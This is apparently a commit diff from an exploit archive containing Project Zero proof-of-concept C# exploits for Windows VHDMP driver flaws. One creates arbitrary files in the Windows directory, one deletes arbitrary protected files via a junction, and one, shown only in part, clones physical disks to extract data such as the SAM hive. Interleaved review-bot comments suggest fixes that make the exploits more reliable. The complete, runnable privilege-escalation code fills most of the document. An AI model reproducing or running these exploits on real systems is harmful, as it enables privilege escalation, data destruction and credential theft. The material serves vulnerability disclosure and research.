Ive provided a PoC as a C# source code file. You need to compile with .NET 4 or higher. Note you must compile as Any CPU or at least the correct bitness for the system under test other setting the dos devices directory has a habit of failing. It will create abc.txt and xyz.txt inside the Windows directory which we normally cant write to.
1) Compile the C# source code file.
2) Execute the poc passing the path
3) It should print that it successfully created a file
Expected Result:
Setting RCT fails.
Observed Result:
The user has created the files \Windows\abc.txt and \Windows\xyz.txt with a valid DACL for the user to modify the files.
*/
using Microsoft.Win32.SafeHandles;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.IO;
using System.Runtime.InteropServices;
using System.Security.AccessControl;
using System.Text;
using System.Linq;
namespace DfscTest
{
class Program
{
[Flags]
public enum AttributeFlags : uint
{
None = 0,
Inherit = 0x00000002,
Permanent = 0x00000010,
Exclusive = 0x00000020,
CaseInsensitive = 0x00000040,
OpenIf = 0x00000080,
OpenLink = 0x00000100,
KernelHandle = 0x00000200,
ForceAccessCheck = 0x00000400,
IgnoreImpersonatedDevicemap = 0x00000800,
DontReparse = 0x00001000,
}
public class IoStatus
{
public IntPtr Pointer;
public IntPtr Information;
public IoStatus()
{
}
public IoStatus(IntPtr p, IntPtr i)
{
Pointer = p;
Information = i;
}
}
[Flags]
public enum ShareMode
{
None = 0,
Read = 0x00000001,
Write = 0x00000002,
Delete = 0x00000004,
}
[Flags]
public enum FileOpenOptions
{
None = 0,
DirectoryFile = 0x00000001,
WriteThrough = 0x00000002,
SequentialOnly = 0x00000004,
NoIntermediateBuffering = 0x00000008,
SynchronousIoAlert = 0x00000010,
SynchronousIoNonAlert = 0x00000020,
NonDirectoryFile = 0x00000040,
CreateTreeConnection = 0x00000080,
CompleteIfOplocked = 0x00000100,
NoEaKnowledge = 0x00000200,
OpenRemoteInstance = 0x00000400,
RandomAccess = 0x00000800,
DeleteOnClose = 0x00001000,
OpenByFileId = 0x00002000,
OpenForBackupIntent = 0x00004000,
NoCompression = 0x00008000,
OpenRequiringOplock = 0x00010000,
ReserveOpfilter = 0x00100000,
OpenReparsePoint = 0x00200000,
OpenNoRecall = 0x00400000,
OpenForFreeSpaceQuery = 0x00800000
}
[Flags]
public enum GenericAccessRights : uint
{
None = 0,
GenericRead = 0x80000000,
GenericWrite = 0x40000000,
GenericExecute = 0x20000000,
GenericAll = 0x10000000,
Delete = 0x00010000,
ReadControl = 0x00020000,
WriteDac = 0x00040000,
WriteOwner = 0x00080000,
Synchronize = 0x00100000,
MaximumAllowed = 0x02000000,
};
[Flags]
enum DirectoryAccessRights : uint
{
Query = 1,
Traverse = 2,
CreateObject = 4,
CreateSubDirectory = 8,
GenericRead = 0x80000000,
GenericWrite = 0x40000000,
GenericExecute = 0x20000000,
GenericAll = 0x10000000,
Delete = 0x00010000,
ReadControl = 0x00020000,
WriteDac = 0x00040000,
WriteOwner = 0x00080000,
Synchronize = 0x00100000,
MaximumAllowed = 0x02000000,
}
[Flags]
public enum ProcessAccessRights : uint
{
None = 0,
CreateProcess = 0x0080,
CreateThread = 0x0002,
DupHandle = 0x0040,
QueryInformation = 0x0400,
QueryLimitedInformation = 0x1000,
SetInformation = 0x0200,
SetQuota = 0x0100,
SuspendResume = 0x0800,
Terminate = 0x0001,
VmOperation = 0x0008,
VmRead = 0x0010,
VmWrite = 0x0020,
MaximumAllowed = GenericAccessRights.MaximumAllowed
};
[Flags]
public enum FileAccessRights : uint
{
None = 0,
ReadData = 0x0001,
WriteData = 0x0002,
AppendData = 0x0004,
ReadEa = 0x0008,
WriteEa = 0x0010,
Execute = 0x0020,
DeleteChild = 0x0040,
ReadAttributes = 0x0080,
WriteAttributes = 0x0100,
GenericRead = 0x80000000,
GenericWrite = 0x40000000,
GenericExecute = 0x20000000,
GenericAll = 0x10000000,
Delete = 0x00010000,
ReadControl = 0x00020000,
WriteDac = 0x00040000,
WriteOwner = 0x00080000,
Synchronize = 0x00100000,
MaximumAllowed = 0x02000000,
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public sealed class UnicodeString
{
ushort Length;
ushort MaximumLength;
[MarshalAs(UnmanagedType.LPWStr)]
string Buffer;
public UnicodeString(string str)
{
Length = (ushort)(str.Length * 2);
MaximumLength = (ushort)((str.Length * 2) + 1);
Buffer = str;
}
}
[DllImport("ntdll.dll")]
static extern int NtClose(IntPtr handle);
public sealed class SafeKernelObjectHandle
: SafeHandleZeroOrMinusOneIsInvalid
{
public SafeKernelObjectHandle()
: base(true)
{
}
public SafeKernelObjectHandle(IntPtr handle, bool owns_handle)
: base(owns_handle)
{
SetHandle(handle);
}
protected override bool ReleaseHandle()
{
if (!IsInvalid)
{
NtClose(this.handle);
this.handle = IntPtr.Zero;
return true;
}
return false;
}
}
public enum SecurityImpersonationLevel
{
Anonymous = 0,
Identification = 1,
Impersonation = 2,
Delegation = 3
}
public enum SecurityContextTrackingMode : byte
{
Static = 0,
Dynamic = 1
}
[StructLayout(LayoutKind.Sequential)]
public sealed class SecurityQualityOfService
{
int Length;
public SecurityImpersonationLevel ImpersonationLevel;
public SecurityContextTrackingMode ContextTrackingMode;
[MarshalAs(UnmanagedType.U1)]
public bool EffectiveOnly;
public SecurityQualityOfService()
{
Length = Marshal.SizeOf(this);
}
}
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
public sealed class ObjectAttributes : IDisposable
{
int Length;
IntPtr RootDirectory;
IntPtr ObjectName;
AttributeFlags Attributes;
IntPtr SecurityDescriptor;
IntPtr SecurityQualityOfService;
private static IntPtr AllocStruct(object s)
{
int size = Marshal.SizeOf(s);
IntPtr ret = Marshal.AllocHGlobal(size);
Marshal.StructureToPtr(s, ret, false);
return ret;
}
private static void FreeStruct(ref IntPtr p, Type struct_type)
{
Marshal.DestroyStructure(p, struct_type);
Marshal.FreeHGlobal(p);
p = IntPtr.Zero;
}
public ObjectAttributes() : this(AttributeFlags.None)
{
}
public ObjectAttributes(string object_name, AttributeFlags attributes) : this(object_name, attributes, null, null, null)
{
}
public ObjectAttributes(AttributeFlags attributes) : this(null, attributes, null, null, null)
{
}
public ObjectAttributes(string object_name) : this(object_name, AttributeFlags.CaseInsensitive, null, null, null)
{
}
public ObjectAttributes(string object_name, AttributeFlags attributes, SafeKernelObjectHandle root, SecurityQualityOfService sqos, GenericSecurityDescriptor security_descriptor)
{
Length = Marshal.SizeOf(this);
if (object_name != null)
{
ObjectName = AllocStruct(new UnicodeString(object_name));
}
Attributes = attributes;
if (sqos != null)
{
SecurityQualityOfService = AllocStruct(sqos);
}
if (root != null)
RootDirectory = root.DangerousGetHandle();
if (security_descriptor != null)
{
byte[] sd_binary = new byte[security_descriptor.BinaryLength];
security_descriptor.GetBinaryForm(sd_binary, 0);
SecurityDescriptor = Marshal.AllocHGlobal(sd_binary.Length);
Marshal.Copy(sd_binary, 0, SecurityDescriptor, sd_binary.Length);
}
}
public void Dispose()
{
if (ObjectName != IntPtr.Zero)
{
FreeStruct(ref ObjectName, typeof(UnicodeString));
}
if (SecurityQualityOfService != IntPtr.Zero)
{
FreeStruct(ref SecurityQualityOfService, typeof(SecurityQualityOfService));
}
if (SecurityDescriptor != IntPtr.Zero)
{
Marshal.FreeHGlobal(SecurityDescriptor);
SecurityDescriptor = IntPtr.Zero;
}
GC.SuppressFinalize(this);
}
~ObjectAttributes()
{
Dispose();
}
}
[DllImport("ntdll.dll")]
public static extern int NtOpenFile(
out IntPtr FileHandle,
FileAccessRights DesiredAccess,
ObjectAttributes ObjAttr,
[In] [Out] IoStatus IoStatusBlock,
ShareMode ShareAccess,
FileOpenOptions OpenOptions);
public static void StatusToNtException(int status)
{
if (status < 0)
{
throw new NtException(status);
}
}
public class NtException : ExternalException
{
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
private static extern IntPtr GetModuleHandle(string modulename);
[Flags]
enum FormatFlags
{
AllocateBuffer = 0x00000100,
FromHModule = 0x00000800,
FromSystem = 0x00001000,
IgnoreInserts = 0x00000200
}
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
private static extern int FormatMessage(
FormatFlags dwFlags,
IntPtr lpSource,
int dwMessageId,
int dwLanguageId,
out IntPtr lpBuffer,
int nSize,
IntPtr Arguments
);
[DllImport("kernel32.dll")]
private static extern IntPtr LocalFree(IntPtr p);
private static string StatusToString(int status)
{
IntPtr buffer = IntPtr.Zero;
try
{
if (FormatMessage(FormatFlags.AllocateBuffer | FormatFlags.FromHModule | FormatFlags.FromSystem | FormatFlags.IgnoreInserts,
GetModuleHandle("ntdll.dll"), status, 0, out buffer, 0, IntPtr.Zero) > 0)
{
return Marshal.PtrToStringUni(buffer);
}
}
finally
{
if (buffer != IntPtr.Zero)
{
LocalFree(buffer);
}
}
return String.Format("Unknown Error: 0x{0:X08}", status);
}
public NtException(int status) : base(StatusToString(status))
{
}
}
public class SafeHGlobalBuffer : SafeHandleZeroOrMinusOneIsInvalid
{
public SafeHGlobalBuffer(int length)
: this(Marshal.AllocHGlobal(length), length, true)
{
}
public SafeHGlobalBuffer(IntPtr buffer, int length, bool owns_handle)
: base(owns_handle)
{
Length = length;
SetHandle(buffer);
}
public int Length
{
get; private set;
}
protected override bool ReleaseHandle()
{
if (!IsInvalid)
{
Marshal.FreeHGlobal(handle);
handle = IntPtr.Zero;
}
return true;
}
}
public class SafeStructureBuffer : SafeHGlobalBuffer
{
Type _type;
public SafeStructureBuffer(object value) : base(Marshal.SizeOf(value))
{
_type = value.GetType();
Marshal.StructureToPtr(value, handle, false);
}
protected override bool ReleaseHandle()
{
if (!IsInvalid)
{
Marshal.DestroyStructure(handle, _type);
}
return base.ReleaseHandle();
}
}
public class SafeStructureOutBuffer<T> : SafeHGlobalBuffer
{
public SafeStructureOutBuffer() : base(Marshal.SizeOf(typeof(T)))
{
}
public T Result
{
get
{
if (IsInvalid)
throw new ObjectDisposedException("handle");
return Marshal.PtrToStructure<T>(handle);
}
}
}
public static SafeFileHandle OpenFile(string name, FileAccessRights DesiredAccess, ShareMode ShareAccess, FileOpenOptions OpenOptions, bool inherit)
{
AttributeFlags flags = AttributeFlags.CaseInsensitive;
if (inherit)
flags |= AttributeFlags.Inherit;
using (ObjectAttributes obja = new ObjectAttributes(name, flags))
{
IntPtr handle;
IoStatus iostatus = new IoStatus();
int status = NtOpenFile(out handle, DesiredAccess, obja, iostatus, ShareAccess, OpenOptions);
StatusToNtException(status);
return new SafeFileHandle(handle, true);
}
}
[DllImport("ntdll.dll")]
public static extern int NtDeviceIoControlFile(
SafeFileHandle FileHandle,
IntPtr Event,
IntPtr ApcRoutine,
IntPtr ApcContext,
[Out] IoStatus IoStatusBlock,
uint IoControlCode,
byte[] InputBuffer,
int InputBufferLength,
byte[] OutputBuffer,
int OutputBufferLength
);
[DllImport("ntdll.dll")]
public static extern int NtFsControlFile(
SafeFileHandle FileHandle,
IntPtr Event,
IntPtr ApcRoutine,
IntPtr ApcContext,
[Out] IoStatus IoStatusBlock,
uint FSControlCode,
[In] byte[] InputBuffer,
int InputBufferLength,
[Out] byte[] OutputBuffer,
int OutputBufferLength
);
[DllImport("ntdll.dll")]
static extern int NtCreateDirectoryObject(out IntPtr Handle, DirectoryAccessRights DesiredAccess, ObjectAttributes ObjectAttributes);
[DllImport("ntdll.dll")]
static extern int NtOpenDirectoryObject(out IntPtr Handle, DirectoryAccessRights DesiredAccess, ObjectAttributes ObjectAttributes);
const int ProcessDeviceMap = 23;
[DllImport("ntdll.dll")]
static extern int NtSetInformationProcess(
IntPtr ProcessHandle,
int ProcessInformationClass,
byte[] ProcessInformation,
int ProcessInformationLength);
static byte[] StructToBytes(object o)
{
int size = Marshal.SizeOf(o);
IntPtr p = Marshal.AllocHGlobal(size);
try
{
Marshal.StructureToPtr(o, p, false);
byte[] ret = new byte[size];
Marshal.Copy(p, ret, 0, size);
return ret;
}
finally
{
if (p != IntPtr.Zero)
Marshal.FreeHGlobal(p);
}
}
static byte[] GetBytes(string s)
{
return Encoding.Unicode.GetBytes(s + "\0");
}
static SafeKernelObjectHandle CreateDirectory(SafeKernelObjectHandle root, string path)
{
using (ObjectAttributes obja = new ObjectAttributes(path, AttributeFlags.CaseInsensitive, root, null, null))
{
IntPtr handle;
StatusToNtException(NtCreateDirectoryObject(out handle, DirectoryAccessRights.GenericAll, obja));
return new SafeKernelObjectHandle(handle, true);
}
}
static SafeKernelObjectHandle OpenDirectory(string path)
{
using (ObjectAttributes obja = new ObjectAttributes(path, AttributeFlags.CaseInsensitive))
{
IntPtr handle;
StatusToNtException(NtOpenDirectoryObject(out handle, DirectoryAccessRights.MaximumAllowed, obja));
return new SafeKernelObjectHandle(handle, true);
}
}
[DllImport("ntdll.dll")]
static extern int NtCreateSymbolicLinkObject(
out IntPtr LinkHandle,
GenericAccessRights DesiredAccess,
ObjectAttributes ObjectAttributes,
UnicodeString DestinationName
);
static SafeKernelObjectHandle CreateSymbolicLink(SafeKernelObjectHandle directory, string path, string target)
{
using (ObjectAttributes obja = new ObjectAttributes(path, AttributeFlags.CaseInsensitive, directory, null, null))
{
IntPtr handle;
StatusToNtException(NtCreateSymbolicLinkObject(out handle, GenericAccessRights.MaximumAllowed, obja, new UnicodeString(target)));
return new SafeKernelObjectHandle(handle, true);
}
}
static void SetDosDirectory(SafeKernelObjectHandle directory)
{
IntPtr p = directory.DangerousGetHandle();
byte[] data = null;
if (IntPtr.Size == 4)
{
data = BitConverter.GetBytes(p.ToInt32());
}
else
{
data = BitConverter.GetBytes(p.ToInt64());
}
StatusToNtException(NtSetInformationProcess(new IntPtr(-1), ProcessDeviceMap, data, data.Length));
}
enum StorageDeviceType
{
Unknown = 0,
Iso = 1,
Vhd = 2,
Vhdx = 3,
VhdSet = 4,
}
[StructLayout(LayoutKind.Sequential)]
struct VirtualStorageType
{
public StorageDeviceType DeviceId;
public Guid VendorId;
}
enum OpenVirtualDiskFlag
{
None = 0,
NoParents = 1,
BlankFile = 2,
BootDrive = 4,
CachedIo = 8,
DiffChain = 0x10,
ParentcachedIo = 0x20,
VhdSetFileOnly = 0x40,
}
enum CreateVirtualDiskVersion
{
Unspecified = 0,
Version1 = 1,
Version2 = 2,
Version3 = 3,
}
[StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
struct CreateVirtualDiskParameters
{
public CreateVirtualDiskVersion Version;
public Guid UniqueId;
public ulong MaximumSize;
public uint BlockSizeInBytes;
public uint SectorSizeInBytes;
public uint PhysicalSectorSizeInBytes;
[MarshalAs(UnmanagedType.LPWStr)]
public string ParentPath;
[MarshalAs(UnmanagedType.LPWStr)]
public string SourcePath;
// Version 2 on
public OpenVirtualDiskFlag OpenFlags;
public VirtualStorageType ParentVirtualStorageType;
public VirtualStorageType SourceVirtualStorageType;
public Guid ResiliencyGuid;
// Version 3 on
[MarshalAs(UnmanagedType.LPWStr)]
public string SourceLimitPath;
public VirtualStorageType BackingStorageType;
}
enum VirtualDiskAccessMask
{
None = 0,
AttachRo = 0x00010000,
AttachRw = 0x00020000,
Detach = 0x00040000,
GetInfo = 0x00080000,
Create = 0x00100000,
MetaOps = 0x00200000,
Read = 0x000d0000,
All = 0x003f0000
}
enum CreateVirtualDiskFlag
{
None = 0x0,
FullPhysicalAllocation = 0x1,
PreventWritesToSourceDisk = 0x2,
DoNotcopyMetadataFromParent = 0x4,
CreateBackingStorage = 0x8,
UseChangeTrackingSourceLimit = 0x10,
PreserveParentChangeTrackingState = 0x20,
}
[DllImport("virtdisk.dll", CharSet=CharSet.Unicode)]
static extern int CreateVirtualDisk(
[In] ref VirtualStorageType VirtualStorageType,
string Path,
VirtualDiskAccessMask VirtualDiskAccessMask,
[In] byte[] SecurityDescriptor,
CreateVirtualDiskFlag Flags,
uint ProviderSpecificFlags,
[In] ref CreateVirtualDiskParameters Parameters,
IntPtr Overlapped,
out IntPtr Handle
);
static Guid GUID_DEVINTERFACE_SURFACE_VIRTUAL_DRIVE = new Guid("2E34D650-5819-42CA-84AE-D30803BAE505");
static Guid VIRTUAL_STORAGE_TYPE_VENDOR_MICROSOFT = new Guid("EC984AEC-A0F9-47E9-901F-71415A66345B");
static SafeFileHandle CreateVHD(string path)
{
VirtualStorageType vhd_type = new VirtualStorageType();
vhd_type.DeviceId = StorageDeviceType.Vhd;
vhd_type.VendorId = VIRTUAL_STORAGE_TYPE_VENDOR_MICROSOFT;
CreateVirtualDiskParameters ps = new CreateVirtualDiskParameters();
ps.Version = CreateVirtualDiskVersion.Version1;
ps.SectorSizeInBytes = 512;
ps.MaximumSize = 100 * 1024 * 1024;
IntPtr hDisk;
int error = CreateVirtualDisk(ref vhd_type, path, VirtualDiskAccessMask.All, null, CreateVirtualDiskFlag.None, 0, ref ps, IntPtr.Zero, out hDisk);
if (error != 0)
{
throw new Win32Exception(error);
}
return new SafeFileHandle(hDisk, true);
}
enum SetVirtualDiskInfoVersion
{
Unspecified = 0,
ParentPath = 1,
Identified = 2,
ParentPathWithDepth = 3,
PhysicalSectionSize = 4,
VirtualDiskId = 5,
ChangeTrackingState = 6,
ParentLocator = 7,
}
[StructLayout(LayoutKind.Sequential)]
struct SetVirtualDiskInfo
{
public SetVirtualDiskInfoVersion Version;
[MarshalAs(UnmanagedType.Bool)]
public bool ChangeTrackingEnabled;
}
[DllImport("virtdisk.dll", CharSet = CharSet.Unicode)]
static extern int SetVirtualDiskInformation(
SafeFileHandle VirtualDiskHandle,
ref SetVirtualDiskInfo VirtualDiskInfo
);
static List<SafeKernelObjectHandle> CreateChainForPath(string path)
{
string[] parts = path.Split('\\');
List<SafeKernelObjectHandle> ret = new List<SafeKernelObjectHandle>();
SafeKernelObjectHandle curr = CreateDirectory(null, null);
ret.Add(curr);
foreach (string part in parts)
{
curr = CreateDirectory(curr, part);
ret.Add(curr);
}
return ret;
}
static void Main(string[] args)
{
try
{
string vhd_path = Path.GetFullPath("test.vhd");
File.Delete(vhd_path);
File.Delete(vhd_path + ".rct");
File.Delete(vhd_path + ".mrt");
Console.WriteLine("[INFO]: Creating VHD {0}", vhd_path);
List<SafeKernelObjectHandle> chain = CreateChainForPath(Path.GetDirectoryName(vhd_path));
SafeKernelObjectHandle rct_symlink = CreateSymbolicLink(chain.Last(), Path.GetFileName(vhd_path) + ".rct", @"\SystemRoot\abc.txt");
SafeKernelObjectHandle mrt_symlink = CreateSymbolicLink(chain.Last(), Path.GetFileName(vhd_path) + ".mrt", @"\SystemRoot\xyz.txt");
using (SafeFileHandle handle = CreateVHD(vhd_path))
{
// Write dummy files for when the kernel impersonates us (and kills the per-process device map)
File.WriteAllBytes(vhd_path + ".rct", new byte[0]);
File.WriteAllBytes(vhd_path + ".mrt", new byte[0]);
SetVirtualDiskInfo disk_info = new SetVirtualDiskInfo();
disk_info.Version = SetVirtualDiskInfoVersion.ChangeTrackingState;
disk_info.ChangeTrackingEnabled = true;
SetDosDirectory(chain.First());
int error = SetVirtualDiskInformation(handle, ref disk_info);
chain[1].Close();
if (error != 0)
{
throw new Win32Exception(error);
}
}
if (!File.Exists(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Windows), "abc.txt")))
{
Console.WriteLine("[ERROR]: Didn't create arbitrary file");
}
else
{
Console.WriteLine("[SUCCESS]: Created arbitary file");
}
}
catch (Exception ex)
{
Console.WriteLine("[ERROR]: {0}", ex.Message);
}
}
}
}

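Review bot: the success check at the end of Main verifies only the `.rct` target: `if (!File.Exists(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Windows), "abc.txt")))`, while the `.mrt` link created a few lines earlier points at `\SystemRoot\xyz.txt` and is never checked, so the PoC cannot report whether the second file was written; either check both targets or drop the second link. Cleanup is also incomplete: only `chain[1].Close();` is called explicitly, the other directory handles in `chain` and the `rct_symlink`/`mrt_symlink` handles are left to process exit, and `SetDosDirectory(chain.First());` has no matching restore after the `SetVirtualDiskInformation` call. Typo in the success message: "arbitary".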
platforms/windows/local/40764.cs Executable file

@ -0,0 +1,245 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=915
Windows: VHDMP ZwDeleteFile Arbitrary File Deletion EoP
Platform: Windows 10 10586 and 14393. No idea about 7 or 8.1 versions.
Class: Elevation of Privilege
Summary:
The VHDMP driver doesnt safely delete files leading to arbitrary file deletion which could result in EoP.
Description:
The VHDMP driver is used to mount VHD and ISO files so that they can be accessed as a normal mounted volume. There are numerous places where the driver calls ZwDeleteFile without specifying OBJ_FORCE_ACCESS_CHECK. This can be abused to delete any arbitrary file or directory on the filesystem by abusing symbolic links to redirect the delete file name to an arbitrary location. Also due to the behaviour of ZwDeleteFile we also dont need to play games with the DosDevices directory or anything like that, the system call opens the target file without specifying FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE flags, this means its possible to use a mount point even to redirect to a file due to the way reparsing works in the kernel.
Some places where ZwDeleteFile is called (based on 10586 x64 vhdmp.sys) are:
VhdmpiDeleteRctFiles
VhdmpiCleanupFileWrapper
VhdmpiInitializeVhdSetExtract
VhdmpiCtCreateEnableTrackingRequest
VhdmpiMultiStageSwitchLogFile
VhdmpiApplySnapshot
And much much more.
You get the idea, as far as I can tell none of these calls actually pass OBJ_FORCE_ACCESS_CHECK flag so all would be vulnerable (assuming you can specify the filename suitably). Note this doesnt need admin rights as we never mount the VHD. However you cant use it in a sandbox as opening the drive goes through multiple access checks.
While deleting files/directories might not seem to be too important you can use it to delete files in ProgramData or Windows\Temp which normally are OWNER RIGHTS locked to the creator. This could then be recreated by the user due to default DACLs and abuse functionality of other services/applications.
Proof of Concept:
Ive provided a PoC as a C# source code file. You need to compile with .NET 4 or higher. It will delete an arbitrary file specified on the command line. It abuses the fact that during VHD creation the kernel will delete the .rct/.mrt files (this limits the poc to Win10 only). So we drop a test.vhd.rct mount point pointing at the target into the same directory and call create.
1) Compile the C# source code file.
2) Execute the poc on Win 10 passing the path to the file to delete. It will check that the file is present and cant be deleted.
3) It should print that it successfully deleted the file
Expected Result:
The target file isnt deleted, the VHD creation fails.
Observed Result:
The target file is deleted.
*/
using Microsoft.Win32.SafeHandles;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace DfscTest
{
class Program
{
enum StorageDeviceType
{
Unknown = 0,
Iso = 1,
Vhd = 2,
Vhdx = 3,
VhdSet = 4,
}
[StructLayout(LayoutKind.Sequential)]
struct VirtualStorageType
{
public StorageDeviceType DeviceId;
public Guid VendorId;
}
enum OpenVirtualDiskFlag
{
None = 0,
NoParents = 1,
BlankFile = 2,
BootDrive = 4,
CachedIo = 8,
DiffChain = 0x10,
ParentcachedIo = 0x20,
VhdSetFileOnly = 0x40,
}
enum CreateVirtualDiskVersion
{
Unspecified = 0,
Version1 = 1,
Version2 = 2,
Version3 = 3,
}
[StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
struct CreateVirtualDiskParameters
{
public CreateVirtualDiskVersion Version;
public Guid UniqueId;
public ulong MaximumSize;
public uint BlockSizeInBytes;
public uint SectorSizeInBytes;
public uint PhysicalSectorSizeInBytes;
[MarshalAs(UnmanagedType.LPWStr)]
public string ParentPath;
[MarshalAs(UnmanagedType.LPWStr)]
public string SourcePath;
// Version 2 on
public OpenVirtualDiskFlag OpenFlags;
public VirtualStorageType ParentVirtualStorageType;
public VirtualStorageType SourceVirtualStorageType;
public Guid ResiliencyGuid;
// Version 3 on
[MarshalAs(UnmanagedType.LPWStr)]
public string SourceLimitPath;
public VirtualStorageType BackingStorageType;
}
enum VirtualDiskAccessMask
{
None = 0,
AttachRo = 0x00010000,
AttachRw = 0x00020000,
Detach = 0x00040000,
GetInfo = 0x00080000,
Create = 0x00100000,
MetaOps = 0x00200000,
Read = 0x000d0000,
All = 0x003f0000
}
enum CreateVirtualDiskFlag
{
None = 0x0,
FullPhysicalAllocation = 0x1,
PreventWritesToSourceDisk = 0x2,
DoNotcopyMetadataFromParent = 0x4,
CreateBackingStorage = 0x8,
UseChangeTrackingSourceLimit = 0x10,
PreserveParentChangeTrackingState = 0x20,
}
[DllImport("virtdisk.dll", CharSet=CharSet.Unicode)]
static extern int CreateVirtualDisk(
[In] ref VirtualStorageType VirtualStorageType,
string Path,
VirtualDiskAccessMask VirtualDiskAccessMask,
[In] byte[] SecurityDescriptor,
CreateVirtualDiskFlag Flags,
uint ProviderSpecificFlags,
[In] ref CreateVirtualDiskParameters Parameters,
IntPtr Overlapped,
out IntPtr Handle
);
static Guid GUID_DEVINTERFACE_SURFACE_VIRTUAL_DRIVE = new Guid("2E34D650-5819-42CA-84AE-D30803BAE505");
static Guid VIRTUAL_STORAGE_TYPE_VENDOR_MICROSOFT = new Guid("EC984AEC-A0F9-47E9-901F-71415A66345B");
static SafeFileHandle CreateVHD(string path)
{
VirtualStorageType vhd_type = new VirtualStorageType();
vhd_type.DeviceId = StorageDeviceType.Vhd;
vhd_type.VendorId = VIRTUAL_STORAGE_TYPE_VENDOR_MICROSOFT;
CreateVirtualDiskParameters ps = new CreateVirtualDiskParameters();
ps.Version = CreateVirtualDiskVersion.Version1;
ps.SectorSizeInBytes = 512;
ps.MaximumSize = 100 * 1024 * 1024;
IntPtr hDisk;
int error = CreateVirtualDisk(ref vhd_type, path, VirtualDiskAccessMask.All, null, CreateVirtualDiskFlag.None, 0, ref ps, IntPtr.Zero, out hDisk);
if (error != 0)
{
throw new Win32Exception(error);
}
return new SafeFileHandle(hDisk, true);
}
static void Main(string[] args)
{
try
{
if (args.Length < 1)
{
Console.WriteLine(@"[USAGE]: poc file\to\delete");
Environment.Exit(1);
}
string delete_path = Path.GetFullPath(args[0]);
if (!File.Exists(delete_path))
{
Console.WriteLine("[ERROR]: Specify a valid file to delete");
Environment.Exit(1);
}
try
{
File.Delete(delete_path);
Console.WriteLine("[ERROR]: Could already delete file, choose one which you normally can't delete");
Environment.Exit(1);
}
catch
{
}
string vhd_path = Path.GetFullPath("test.vhd");
File.Delete(vhd_path);
try
{
Directory.Delete(vhd_path + ".rct");
}
catch
{
}
Console.WriteLine("[INFO]: Creating VHD {0}", vhd_path);
string cmdline = String.Format("/C mklink /J \"{0}.rct\" \"{1}\"", vhd_path, args[0]);
ProcessStartInfo start_info = new ProcessStartInfo("cmd", cmdline);
start_info.UseShellExecute = false;
Process p = Process.Start(start_info);
p.WaitForExit();
if (p.ExitCode != 0)
{
Console.WriteLine("[ERROR]: Can't create symlink");
Environment.Exit(1);
}
using (SafeFileHandle handle = CreateVHD(vhd_path))
{
}
if (File.Exists(delete_path))
{
Console.WriteLine("[ERROR]: Didn't delete arbitrary file");
}
else
{
Console.WriteLine("[SUCCESS]: Deleted arbitary file");
}
}
catch (Exception ex)
{
Console.WriteLine("[ERROR]: {0}", ex.Message);
}
}
}
}

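Review bot: the junction is built from the raw argument rather than the resolved path: `String.Format("/C mklink /J \"{0}.rct\" \"{1}\"", vhd_path, args[0]);` uses `args[0]` although `delete_path = Path.GetFullPath(args[0])` was computed for exactly this purpose, so a relative target is handed to mklink as typed and depends on cmd's working directory; pass `delete_path` instead. Two further points: the pre-check `File.Delete(delete_path);` really deletes the target when it happens to be deletable, so the user loses the file before seeing "choose one which you normally can't delete" (a non-destructive probe, opening for DELETE access and closing without setting a disposition, would be friendlier), and `test.vhd` plus the `test.vhd.rct` junction are left behind after a run and only removed at the start of the next one. The namespace `DfscTest` also looks inherited from another test; the sibling PoC in this commit uses `Poc`.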
platforms/windows/local/40765.cs Executable file

@ -0,0 +1,257 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=916
Windows: VHDMP Arbitrary Physical Disk Cloning EoP
Platform: Windows 10 10586. No idea about 14393, 7 or 8.1 versions.
Class: Elevation of Privilege
Summary:
The VHDMP driver doesnt open physical disk drives securely when creating a new VHD leading to information disclosure and EoP by allowing a user to access data theyre shouldnt have access to.
Description:
The VHDMP driver is used to mount VHD and ISO files so that they can be accessed as a normal mounted volume. When creating a new VHD its possible to specify a physical drive to clone from, youd assume that this feature would be limited to only administrators as accessing a physical disk for read access is limited to administrators group and system. However when calling VhdmpiTryOpenPhysicalDisk the driver uses ZwOpenFile and doesnt specify the OBJ_FORCE_ACCESS_CHECK flag. As no other administrator checks are done this means that a normal user can clone the physical disk to another file which they can read, to bypass DACL checks on NTFS and extract data such as the SAM hive.
Proof of Concept:
Ive provided a PoC as a C# source code file. You need to compile with .NET 4 or higher. It will create a new VHDX from a specified physical drive. Note as this is a physical clone itll presumably not bypass Bitlocker, but thats not likely to be a major issue in a lot of cases.
1) Compile the C# source code file.
2) Execute the poc on Win 10 passing the path to the vhd file to create and the physical drive index of the drive to clone. If you run without arguments itll print which drives are available. You probably want to clone one drive to another otherwise youd likely run out of space (and of course have enough space). It also should work to copy the vhd out to a network share.
3) It should print that it created the clone of the drive. If you now mount that VHD somewhere else it should contain the original file systems of the original disk.
Expected Result:
The VHD creation fails with access denied.
Observed Result:
The physical disk is cloned successfully.
*/
using Microsoft.Win32.SafeHandles;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.IO;
using System.Management;
using System.Runtime.InteropServices;
using System.Linq;
namespace Poc
{
class Program
{
enum StorageDeviceType
{
Unknown = 0,
Iso = 1,
Vhd = 2,
Vhdx = 3,
VhdSet = 4,
}
[StructLayout(LayoutKind.Sequential)]
struct VirtualStorageType
{
public StorageDeviceType DeviceId;
public Guid VendorId;
}
enum OpenVirtualDiskFlag
{
None = 0,
NoParents = 1,
BlankFile = 2,
BootDrive = 4,
CachedIo = 8,
DiffChain = 0x10,
ParentcachedIo = 0x20,
VhdSetFileOnly = 0x40,
}
enum CreateVirtualDiskVersion
{
Unspecified = 0,
Version1 = 1,
Version2 = 2,
Version3 = 3,
}
[StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
struct CreateVirtualDiskParameters
{
